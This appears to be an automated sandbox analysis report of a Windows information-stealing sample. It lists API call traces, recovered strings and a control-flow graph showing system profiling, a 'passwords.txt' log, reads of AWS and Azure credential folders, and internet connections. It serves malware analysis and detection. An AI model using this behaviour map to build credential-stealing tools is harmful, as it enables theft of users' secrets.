                                                      • Part of subcall function 00413563: OpenProcess.KERNEL32(00000410,00000000,004154AA), ref: 00413576
                                                      • Part of subcall function 00413563: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00413596
                                                      • Part of subcall function 00413563: CloseHandle.KERNEL32(00000000), ref: 0041359F
                                                      • Part of subcall function 00411ADD: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411AF1
                                                      • Part of subcall function 00411ADD: HeapAlloc.KERNEL32(00000000), ref: 00411AF8
                                                      • Part of subcall function 004127AF: CoInitializeEx.OLE32(00000000,00000000,?,?,?,?,00428E48,00000000,?,00000000,00000000,?,Windows: ,00000000,?,00428FE4), ref: 004127D9
                                                      • Part of subcall function 004127AF: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00428E48,00000000,?), ref: 004127F1
                                                      • Part of subcall function 004127AF: CoCreateInstance.OLE32(0042AE78,00000000,00000001,0042ADA8,00000000,?,?,?,?,00428E48,00000000,?,00000000,00000000,?,Windows: ), ref: 0041280D
                                                      • Part of subcall function 004127AF: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,?,00428E48,00000000,?,00000000), ref: 00412855
                                                      • Part of subcall function 004129BF: CoInitializeEx.OLE32(00000000,00000000,?,?,?,Windows: ,00000000,?,00428FE4,00000000,?,Work Dir: In memory,00000000,?,00428E48,00000000), ref: 004129E9
                                                      • Part of subcall function 004129BF: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,Windows: ,00000000,?,00428FE4), ref: 00412A01
                                                      • Part of subcall function 004129BF: CoCreateInstance.OLE32(0042AE78,00000000,00000001,0042ADA8,00000000,?,?,?,Windows: ,00000000,?,00428FE4,00000000,?), ref: 00412A1D
                                                      • Part of subcall function 004129BF: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,Windows: ,00000000,?,00428FE4,00000000), ref: 00412A65
                                                      • Part of subcall function 00411C21: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00415711,00000000,?,Computer Name: ,00000000,?,00428E48,00000000,?,00000000,00000000), ref: 00411C2D
                                                      • Part of subcall function 00411C21: HeapAlloc.KERNEL32(00000000,?,?,?,00415711,00000000,?,Computer Name: ,00000000,?,00428E48,00000000,?,00000000,00000000,?), ref: 00411C34
                                                      • Part of subcall function 00411C21: GetComputerNameA.KERNEL32(00000000,00000104), ref: 00411C4B
                                                      • Part of subcall function 00411BEC: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0041A955), ref: 00411BF8
                                                      • Part of subcall function 00411BEC: HeapAlloc.KERNEL32(00000000,?,?,?,0041A955), ref: 00411BFF
                                                      • Part of subcall function 00411BEC: GetUserNameA.ADVAPI32(?,00000104), ref: 00411C16
                                                      • Part of subcall function 0041254A: CreateDCA.GDI32(00000000,00000000,00000000,?), ref: 0041255C
                                                      • Part of subcall function 0041254A: GetDeviceCaps.GDI32(?,00000008), ref: 0041256A
                                                      • Part of subcall function 0041254A: GetDeviceCaps.GDI32(?,0000000A), ref: 00412578
                                                      • Part of subcall function 0041254A: ReleaseDC.USER32(00000000,?), ref: 00412586
                                                      • Part of subcall function 0041254A: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00412593
                                                      • Part of subcall function 0041254A: HeapAlloc.KERNEL32(00000000), ref: 0041259A
                                                      • Part of subcall function 0041254A: wsprintfA.USER32 ref: 004125B1
                                                      • Part of subcall function 00411D31: GetKeyboardLayoutList.USER32(00000000,00000000,00425200), ref: 00411D59
                                                      • Part of subcall function 00411D31: LocalAlloc.KERNEL32(00000040,?), ref: 00411D71
                                                      • Part of subcall function 00411D31: GetKeyboardLayoutList.USER32(?,00000000), ref: 00411D83
                                                      • Part of subcall function 00411D31: GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200), ref: 00411DD3
                                                      • Part of subcall function 00411D31: LocalFree.KERNEL32(00000000), ref: 00411E90
                                                      • Part of subcall function 00411CBF: GetProcessHeap.KERNEL32(00000000,00000104,00428E48,00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00428E48,00000000,?,00000000,00000000), ref: 00411CCF
                                                      • Part of subcall function 00411CBF: HeapAlloc.KERNEL32(00000000), ref: 00411CD6
                                                      • Part of subcall function 00411CBF: GetTimeZoneInformation.KERNEL32(?), ref: 00411CE9
                                                      • Part of subcall function 00411EB5: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00411EC9
                                                      • Part of subcall function 00411EB5: HeapAlloc.KERNEL32(00000000), ref: 00411ED0
                                                      • Part of subcall function 00411EB5: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000), ref: 00411EEF
                                                      • Part of subcall function 00411EB5: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,000000FF,000000FF), ref: 00411F0D
                                                      • Part of subcall function 00411F54: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00411F87
                                                      • Part of subcall function 00411F54: GetLastError.KERNEL32 ref: 00411F96
                                                      • Part of subcall function 00411F21: GetSystemInfo.KERNEL32(00000000), ref: 00411F2E
                                                      • Part of subcall function 00411F21: wsprintfA.USER32 ref: 00411F43
                                                      • Part of subcall function 00412081: GetProcessHeap.KERNEL32(00000000,00000104,?,00428E48,00000000,?,00000000,00000000,?,Windows: ,00000000,?,00428FE4,00000000,?,Work Dir: In memory), ref: 0041208E
                                                      • Part of subcall function 00412081: HeapAlloc.KERNEL32(00000000), ref: 00412095
                                                      • Part of subcall function 00412081: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 004120B6
                                                      • Part of subcall function 00412081: __aulldiv.LIBCMT ref: 004120CE
                                                      • Part of subcall function 00412081: __aulldiv.LIBCMT ref: 004120DC
                                                      • Part of subcall function 00412081: wsprintfA.USER32 ref: 004120FF
                                                      • Part of subcall function 0041210D: EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000001), ref: 00412148
                                                      • Part of subcall function 0041246A: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00412491
                                                      • Part of subcall function 0041246A: Process32First.KERNEL32(00000000,00000128), ref: 004124A4
                                                      • Part of subcall function 0041246A: Process32Next.KERNEL32(00000000,00000128), ref: 004124B8
                                                      • Part of subcall function 0041246A: CloseHandle.KERNEL32(00000000), ref: 00412525
                                                      • Part of subcall function 0041218B: RegOpenKeyExA.KERNEL32(00000000,00000000,00020019,00000000,00425200), ref: 004121DE
                                                      • Part of subcall function 0041218B: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00412259
                                                      • Part of subcall function 0041218B: wsprintfA.USER32 ref: 0041228B
                                                      • Part of subcall function 0041218B: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 004122AC
                                                    • lstrlenA.KERNEL32(00000000,00000000,?,00428FE4,00000000,?,00000000,00000000,?,00000000,00000000,?,[Software],00000000,?,00428FE4), ref: 00415DE1
                                                      • Part of subcall function 00418DB9: _MSFOpenExW.MSPDB140-MSVCRT ref: 00418E6C
                                                      • Part of subcall function 00418DB9: CreateThread.KERNEL32(00000000,00000000,00418C65,?,00000000,00000000), ref: 00418E85
                                                      • Part of subcall function 00418DB9: WaitForSingleObject.KERNEL32(?,000003E8), ref: 00418E96
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$Process$Alloc$Open$Createwsprintf$Initializelstrcpy$InformationLocalName$BlanketCapsCloseCurrentDeviceEnumHandleInfoInstanceKeyboardLayoutListProcess32ProxyQuerySecurityTimeValue__aulldivlstrcatlstrlen$CharComputerDevicesDirectoryDisplayErrorFileFirstFreeGlobalLastLocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                    • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                    • API String ID: 4242084749-1014693891
                                                    • Opcode ID: ec29a3163d9d18987f0e179795c7a0416d16bd3ffa26116ace8d5c82db2c5aaf
                                                    • Instruction ID: 98b063b3ea0cf676e7d3c9db5d6b4e855844e07ef84fbbd767ca72325addcb2a
                                                    • Opcode Fuzzy Hash: ec29a3163d9d18987f0e179795c7a0416d16bd3ffa26116ace8d5c82db2c5aaf
                                                    • Instruction Fuzzy Hash: BC629172900118AACB15F7A1DD96DDE7379AF14305F5042AFF226B21B1EF346B88CE58
                                                    Function 004083A6 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 265stringmemoryfileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 00412D64: GetSystemTime.KERNEL32(00000000,00425200), ref: 00412D8A
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,?,004251E8,?,00000000,00425200), ref: 00408450
                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004084C9
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 004084D0
                                                    • lstrlenA.KERNEL32(00000000,00000000), ref: 0040856A
                                                    • lstrcatA.KERNEL32(?), ref: 0040858F
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 004085A1
                                                    • lstrcatA.KERNEL32(?,00428E50), ref: 004085AF
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 004085C1
                                                    • lstrcatA.KERNEL32(?,00428E4C), ref: 004085CF
                                                    • lstrcatA.KERNEL32(?), ref: 004085DE
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 004085F0
                                                    • lstrcatA.KERNEL32(?,00428E48), ref: 004085FE
                                                    • lstrcatA.KERNEL32(?), ref: 0040860D
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040861F
                                                    • lstrcatA.KERNEL32(?,00428E48), ref: 0040862D
                                                    • lstrcatA.KERNEL32(?), ref: 0040863C
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040864E
                                                    • lstrcatA.KERNEL32(?,00428E48), ref: 0040865C
                                                    • lstrcatA.KERNEL32(?,00428E48), ref: 0040866A
                                                    • lstrlenA.KERNEL32(?), ref: 00408688
                                                    • memset.MSVCRT ref: 004086D4
                                                    • DeleteFileA.KERNEL32(00000000), ref: 00408701
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 004135B9: memset.MSVCRT ref: 004135D4
                                                      • Part of subcall function 004135B9: OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041368A
                                                      • Part of subcall function 004135B9: TerminateProcess.KERNEL32(00000000,00000000), ref: 004136A7
                                                      • Part of subcall function 004135B9: CloseHandle.KERNEL32(00000000), ref: 004136B3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$lstrcpy$Processlstrlen$FileHeapmemset$AllocateCloseCopyDeleteHandleOpenSystemTerminateTime
                                                    • String ID: passwords.txt
                                                    • API String ID: 1737540870-347816968
                                                    • Opcode ID: e7516f4a65ce10130fd093f07ba65f7fdb76d7e0e32bba32449652ac384407af
                                                    • Instruction ID: 4868cb4a0c5d8df9b0255056c1bbdf5f8baa826a61240bfbc382e0845978a72e
                                                    • Opcode Fuzzy Hash: e7516f4a65ce10130fd093f07ba65f7fdb76d7e0e32bba32449652ac384407af
                                                    • Instruction Fuzzy Hash: 00A11972900108AFDF05EBA1ED5AAED7B79FF15305F60502AF112B10B1EF3A5A44CB69
                                                    Function 00418FD9 Relevance: 34.5, APIs: 4, Strings: 15, Instructions: 1237networksleepCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2320 418fd9-419078 call 4218f0 call 411668 call 41a3b1 call 41a3e6 call 411715 * 2 2333 41907e-41908b 2320->2333 2334 4190b7-4190c7 2333->2334 2335 41908d-4190b5 call 411648 * 2 2333->2335 2337 4190cd-4190da 2334->2337 2335->2333 2339 419106-419116 2337->2339 2340 4190dc-419104 call 411648 * 2 2337->2340 2343 41911c-419129 2339->2343 2340->2337 2344 419147-419157 2343->2344 2345 41912b-419145 call 41a3e6 2343->2345 2349 41915d-41916a 2344->2349 2345->2343 2352 419188-419198 2349->2352 2353 41916c-419186 call 41a410 2349->2353 2356 41919e-4191ab 2352->2356 2353->2349 2358 4191c9-4191d9 2356->2358 2359 4191ad-4191c7 call 41a461 2356->2359 2361 4191df-4191ec 2358->2361 2359->2356 2363 41920a-419233 call 402727 call 41b050 call 40101e 2361->2363 2364 4191ee-419208 call 41a496 2361->2364 2373 4195c9-4197a4 call 412d64 call 41177a call 411701 call 411668 call 41185b call 4117e0 call 41177a call 411701 * 2 call 41193a CreateDirectoryA call 40134c call 418167 call 41a4cb call 418c01 call 41177a * 2 call 4116b4 call 41185b call 41177a call 411701 call 4117e0 call 41177a call 411701 call 41193a InternetOpenA call 41193a InternetOpenA call 4116b4 call 402278 call 411668 call 411948 call 4116b4 call 4043fa call 414f8c 2363->2373 2374 419239-41959c call 411668 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41193a call 4138ba 2363->2374 2364->2361 2503 4197a6 2373->2503 2504 4197ad-419909 call 411668 call 40134c call 4058c4 call 4148a0 call 411668 call 40134c call 4058c4 call 4145d9 call 411668 call 40134c call 4058c4 call 4147a4 call 40134c call 4151e4 call 4116b4 call 41193a call 411668 call 404ad5 call 40134c call 40f99f 2373->2504 2623 4195be-4195c4 call 411701 2374->2623 2624 41959e-4195a7 call 4216c8 2374->2624 2503->2504 2585 41990e-419918 2504->2585 2587 419985-419989 2585->2587 2588 41991a-41997f call 411668 call 40134c call 4058c4 call 41497b call 40134c call 401f1f 2585->2588 2590 4199f6-419a65 call 411668 call 40134c call 4058c4 call 414ab5 call 40134c call 416c95 2587->2590 2591 41998b-4199f0 call 411668 call 40134c call 4058c4 call 4144c3 call 40134c call 414411 2587->2591 2588->2587 2640 419a93-419a97 2590->2640 2641 419a67-419a90 call 40134c call 416f6b call 40134c call 418f44 2590->2641 2591->2590 2623->2373 2634 4195ac-4195b4 2624->2634 2634->2623 2643 419a99-419aac call 40134c call 417659 2640->2643 2644 419aaf-419ab3 2640->2644 2641->2640 2643->2644 2645 419ab5-419ac8 call 40134c call 417b07 2644->2645 2646 419acb-419acf 2644->2646 2645->2646 2652 419ad1-419ae4 call 40134c call 417c93 2646->2652 2653 419ae7-419aea 2646->2653 2652->2653 2654 419b06-419b0a 2653->2654 2655 419aec-419af3 2653->2655 2663 419b24-419b28 2654->2663 2664 419b0c-419b21 call 40134c call 413160 2654->2664 2660 419b02 2655->2660 2661 419af5-419b04 Sleep 2655->2661 2660->2654 2661->2653 2672 419b95-419bd3 call 411668 call 40134c call 4058c4 call 411701 call 40101e 2663->2672 2673 419b2a-419b8f call 411668 call 40134c call 4058c4 call 4144c3 call 40134c call 414411 2663->2673 2664->2663 2701 419bd9-419f3c call 411668 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41193a call 4138ba 2672->2701 2702 41a12b-41a18f call 41193a call 413878 call 40134c call 41a508 call 411701 * 2 2672->2702 2673->2672 2871 41a120-41a126 call 411701 2701->2871 2872 419f42-41a11b call 42175f call 411668 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 411668 call 4116b4 * 3 call 404e03 call 411701 * 2 2701->2872 2730 41a195-41a1a2 2702->2730 2732 41a1c0-41a1e6 2730->2732 2733 41a1a4-41a1be call 4143df 2730->2733 2736 41a1ec-41a1f9 2732->2736 2733->2730 2739 41a217-41a23d 2736->2739 2740 41a1fb-41a215 call 416c63 2736->2740 2743 41a243-41a250 2739->2743 2740->2736 2746 41a252-41a26c call 41a43a 2743->2746 2747 41a26e-41a294 2743->2747 2746->2743 2748 41a29a-41a2a7 2747->2748 2751 41a2c5-41a2eb 2748->2751 2752 41a2a9-41a2c3 call 418c01 2748->2752 2756 41a2f1-41a2fe 2751->2756 2752->2748 2759 41a300-41a328 call 411701 * 2 2756->2759 2760 41a32a-41a350 2756->2760 2759->2756 2764 41a356-41a363 2760->2764 2767 41a365-41a38d call 411701 * 2 2764->2767 2768 41a38f-41a3b0 call 418c01 call 40131a call 411701 2764->2768 2767->2764 2871->2702 2872->2871
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 00411715: lstrlenA.KERNEL32(?,?,?,00419018,00425200,00425200,?,?,?,0041ABB6), ref: 0041171F
                                                      • Part of subcall function 00411715: lstrcpyA.KERNEL32(0041ABB6,00000000,?,00419018,00425200,00425200), ref: 0041176D
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 004138BA: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004138F5
                                                      • Part of subcall function 004138BA: Process32First.KERNEL32(00429888,00000128), ref: 00413908
                                                      • Part of subcall function 004138BA: Process32Next.KERNEL32(00429888,00000128), ref: 0041391C
                                                      • Part of subcall function 004138BA: StrCmpCA.SHLWAPI(?,0042988C), ref: 00413930
                                                      • Part of subcall function 004138BA: FindCloseChangeNotification.KERNEL32(00429888), ref: 00413943
                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,?,?,?,00425200,00000000), ref: 00419657
                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041972D
                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419747
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 00411948: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00411964
                                                      • Part of subcall function 00411948: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004119A1
                                                      • Part of subcall function 00411948: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411A18
                                                      • Part of subcall function 00411948: HeapAlloc.KERNEL32(00000000), ref: 00411A1F
                                                      • Part of subcall function 004043FA: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404492
                                                      • Part of subcall function 004043FA: StrCmpCA.SHLWAPI(?), ref: 004044B2
                                                      • Part of subcall function 00414F8C: StrCmpCA.SHLWAPI(00000000,block), ref: 00414FB1
                                                      • Part of subcall function 00414F8C: ExitProcess.KERNEL32 ref: 00414FBD
                                                      • Part of subcall function 0040F99F: StrCmpCA.SHLWAPI(00000000,?,?), ref: 0040F9EF
                                                      • Part of subcall function 0040F99F: StrCmpCA.SHLWAPI(00000000,?,?), ref: 0040FA75
                                                      • Part of subcall function 004058C4: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040595F
                                                      • Part of subcall function 004058C4: StrCmpCA.SHLWAPI(?), ref: 00405975
                                                      • Part of subcall function 0041497B: strtok_s.MSVCRT ref: 004149A3
                                                      • Part of subcall function 0041497B: strtok_s.MSVCRT ref: 00414A94
                                                      • Part of subcall function 00417B07: lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00417B40
                                                      • Part of subcall function 00417B07: lstrcatA.KERNEL32(?), ref: 00417B5E
                                                    • Sleep.KERNEL32(000003E8), ref: 00419AFA
                                                      • Part of subcall function 00417C93: memset.MSVCRT ref: 00417CAA
                                                      • Part of subcall function 00417C93: lstrcatA.KERNEL32(?,00000000), ref: 00417CD1
                                                      • Part of subcall function 00417C93: lstrcatA.KERNEL32(?,\.azure\), ref: 00417CEE
                                                      • Part of subcall function 00417C93: memset.MSVCRT ref: 00417D2E
                                                      • Part of subcall function 00417C93: lstrcatA.KERNEL32(?,00000000), ref: 00417D55
                                                      • Part of subcall function 00417C93: lstrcatA.KERNEL32(?,\.aws\), ref: 00417D72
                                                      • Part of subcall function 00417C93: memset.MSVCRT ref: 00417DB2
                                                      • Part of subcall function 00417C93: lstrcatA.KERNEL32(?,00000000), ref: 00417DD9
                                                      • Part of subcall function 00417C93: lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00417DF6
                                                      • Part of subcall function 00404E03: lstrlenA.KERNEL32(00000000), ref: 00404E8B
                                                      • Part of subcall function 00404E03: StrCmpCA.SHLWAPI(?,00425200,00425200,00425200,00425200), ref: 00404EEF
                                                      • Part of subcall function 00404E03: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F17
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$InternetOpenlstrcpy$lstrlenmemset$CreateDirectoryHeapProcessProcess32strtok_s$AllocChangeCloseExitFindFirstInformationNextNotificationSleepSnapshotToolhelp32VolumeWindows
                                                    • String ID: .exe$2$2$_DEBUG.zip$arp$d$d$d$d$d$d$dabl$http://$org$tea
                                                    • API String ID: 4021577771-4025179836
                                                    • Opcode ID: d8ddd20c65dbe4accbe59cdc2a04e807221df0d548ce8610666dd4a4d36cae5e
                                                    • Instruction ID: 114828df09490f9f1d13115ca2c7a84a7d1e175cc6150afb538a57f6698be508
                                                    • Opcode Fuzzy Hash: d8ddd20c65dbe4accbe59cdc2a04e807221df0d548ce8610666dd4a4d36cae5e
                                                    • Instruction Fuzzy Hash: 93B22F71D041289ADB14FB61DC96ADDB778AB11304F5440EAE50EA21A1DF3C6FC8CF69
